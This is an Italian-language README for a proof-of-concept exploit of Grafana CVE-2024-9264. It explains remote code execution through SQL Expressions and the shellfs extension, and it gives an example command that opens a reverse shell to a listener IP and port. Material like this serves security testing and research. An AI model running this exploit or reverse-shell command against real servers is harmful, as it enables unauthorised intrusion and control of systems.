
Proof-of-concept in Python per l'esecuzione remota di codice in Grafana tramite SQL Expressions, che sfrutta una sanitizzazione insufficiente degli input per eseguire comandi shell arbitrari su target autenticati.
Prova di concetto per l'esecuzione remota di codice in Grafana (CVE-2024-9264)
Questo repository contiene uno script Python che sfrutta una vulnerabilità di esecuzione remota di codice (RCE) nella funzionalità SQL Expressions di Grafana. Sfruttando una sanificazione insufficiente dell'input, questo exploit permette a un attaccante di eseguire comandi shell arbitrari sul server. Ciò è reso possibile tramite l'estensione community shellfs, che può essere installata e caricata da un attaccante per facilitare l'esecuzione dei comandi.
Viewer o superioriGrafana >= v11.0.0 (tutte le v11.x.y sono interessate)
python3 poc.py [--url <target>] [--username <username>] [--password <password>] [--reverse-ip <IP>] [--reverse-port <PORT>]

python poc.py --url http://127.0.0.1:3000 --username eviluser --password eviluser --reverse-ip 10.10.1.41 --reverse-port 9001
Questo script è destinato a scopi educativi e per l'uso in ambienti controllati in cui si ha il permesso di testare la sicurezza del sistema. L'uso improprio di questo strumento potrebbe comportare conseguenze legali.